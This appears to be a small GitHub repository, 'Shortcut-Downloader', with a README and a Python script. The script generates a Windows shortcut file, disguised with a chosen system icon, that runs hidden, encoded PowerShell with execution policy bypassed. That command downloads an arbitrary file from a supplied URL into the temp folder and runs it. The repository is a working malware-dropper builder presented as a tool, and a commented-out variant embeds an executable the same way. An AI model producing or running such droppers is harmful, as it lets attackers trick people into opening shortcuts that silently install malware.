├── demo.gif
├── README.md
└── shortcut.py


/demo.gif:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/codecrack3/Shortcut-Downloader/HEAD/demo.gif


--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
 1 | # Shortcut-Downloader
 2 | Shortcut Downloader using Windows shortcut
 3 | 
 4 | Example:
 5 | 
 6 | shortcut.py -p payload -l link -s savename -i icon
 7 | #
 8 | shortcut.py -p download -l https://the.earth.li/~sgtatham/putty/latest/x86/putty.exe -s test.exe -i 1
 9 | 
10 | ![My image](https://github.com/codecrack3/Shortcut-Downloader/blob/master/demo.gif)
11 | 


--------------------------------------------------------------------------------
/shortcut.py:
--------------------------------------------------------------------------------
  1 | 
  2 | #!/usr/bin/env python
  3 | # -.- coding: utf-8 -.-
  4 | # shortcut.py
  5 | # authors: kaisai12
  6 | 
  7 | """
  8 | Copyright (C) 201 kaisai12 (kaisai@ceh.vn)
  9 | """
 10 | 
 11 | 
 12 | 
 13 | 
 14 | import random, sys, string;
 15 | from subprocess import Popen, PIPE
 16 | from base64 import b64encode
 17 | import argparse
 18 | import os
 19 | 
 20 | class builder():
 21 | 	def __init__(self,options,):
 22 | 		self.options = options
 23 | 	@staticmethod
 24 | 	def base64payload(url,save):
 25 | 		endata = '(New-Object System.Net.WebClient).DownloadFile("{0}", "$env:temp\{1}");[System.Diagnostics.Process]::Start("$env:temp\{2}");'.format(url,save,save)
 26 | 		return b64encode(endata.encode('UTF-16LE')) 
 27 | 	@staticmethod
 28 | 	def ganeratepowershell(url,save):
 29 | 		
 30 | 		maliciouspw = "powershell -NonI -W Hidden -NoP -Exec Bypass -EncodedCommand %s" % (str(builder.base64payload(url,save)))
 31 | 		return maliciouspw
 32 | 	@staticmethod
 33 | 	def ganeratepowershellvbs(string):
 34 | 		
 35 | 		maliciouspw = "powershell -NonI -W Hidden -NoP -Exec Bypass -Enc %s" % (str(b64encode(string.encode('UTF-16LE'))))
 36 | 		return maliciouspw
 37 | 
 38 | 	def vbs(self):
 39 | 		try:
 40 | 			builder.makepayload(builder.genaratevbs("",self.infile),"kai","2")
 41 | 			
 42 | 			print '[+] Build vbs... '
 43 | 			
 44 | 		except Exception as ex:
 45 | 			print ex
 46 | 	@staticmethod
 47 | 	def makepayload(string,name,icon):
 48 | 		if string and name and icon != '':
 49 | 			
 50 | 			
 51 | 			payload = "$WshShell = New-Object -ComObject WScript.Shell;$Shortcut = $WshShell.CreateShortcut('{1}.lnk');$Shortcut.TargetPath = 'cmd.exe';$Shortcut.Arguments =' /c {0}';$Shortcut.IconLocation = 'shell32.dll,{2}';$Shortcut.Save()".format(string,name,icon)
 52 | 			
 53 | 			try:
 54 | 				
 55 | 				a = Popen('powershell -EncodedCommand '+b64encode(payload.encode('UTF-16LE')),stdin = PIPE, stdout = PIPE, stderr = PIPE, shell = False)
 56 | 				print "[+] Done "
 57 | 				print "[+] File save: %s" % os.getcwd() + "\out.lnk"
 58 | 
 59 | 			except Exception as e:
 60 | 				print '[-] %s' % e
 61 | 	def base64codeps(self,string):
 62 | 
 63 | 		return b64encode(string.encode('UTF-16LE'))
 64 | 
 65 | 	# def makebuildermarco(self): # function not working ? are you sure =))
 66 | 	# 	if self.infile != '':
 67 | 	# 		payload = '$ByteArray = [System.IO.File]::ReadAllBytes("{0}");$Base64String = [System.Convert]::ToBase64String($ByteArray);$Base64String'.format(str(self.infile))
 68 | 	# 		try:
 69 | 	# 			a = Popen('powershell -EncodedCommand '+self.base64codeps(payload),stdin = PIPE, stdout = PIPE, stderr = PIPE,shell = True).communicate()
 70 | 				
 71 | 	# 			payload2 = '[System.IO.File]::WriteAllBytes("temp.exe", [System.Convert]::FromBase64String("{0}"));'.format(str(a[0]))
 72 | 				
 73 | 	# 			maliciouspw = "powershell -NonI -W Hidden -NoP -Exec Bypass -EncodedCommand %s" % (str(self.base64codeps(payload2)))
 74 | 				
 75 | 	# 			builder.makepayload(maliciouspw,"ahihi.lnk","1")
 76 | 	# 			print '[+] Buiding OK '
 77 | 
 78 | 
 79 | 	# 		except Exception as e:
 80 | 	# 			print '[-] %s' % e
 81 | 
 82 | 
 83 | def banner():
 84 | 	banner = '''
 85 | 	  __                             _                                    
 86 |  (_  |_   _  ._ _|_  _    _|_   | \  _       ._  |  _   _.  _|  _  ._ 
 87 |  __) | | (_) |   |_ (_ |_| |_   |_/ (_) \/\/ | | | (_) (_| (_| (/_ |  
 88 |                                                                                                                                                                                                                 '''
 89 | 
 90 | 
 91 | 	return banner                                                                                                                                              			
 92 | 
 93 | def parse_args():
 94 | 	parser = argparse.ArgumentParser()
 95 | 	parser.add_argument('-p', '--type', help='Type building (download)')
 96 | 	parser.add_argument('-l', '--link', help='Link file download ')
 97 | 	parser.add_argument('-s', '--save', help='output name ')
 98 | 	parser.add_argument('-i', '--icon', default='1' ,help='Type icon ')
 99 | 	return parser.parse_args()
100 | 
101 | if __name__ == '__main__':
102 | 	print banner()
103 | 	arg = parse_args()
104 | 	if not arg.type:
105 | 		
106 | 		sys.exit('[!] Error (exam shortcut.py -p <payload> -k <link> -s <save.type> -i <icon> ')
107 | 	if arg.type == 'download' and arg.link != '' and arg.save != '':
108 | 		builder.makepayload(builder.ganeratepowershell(arg.link,arg.save),"out",arg.icon)
109 | 


--------------------------------------------------------------------------------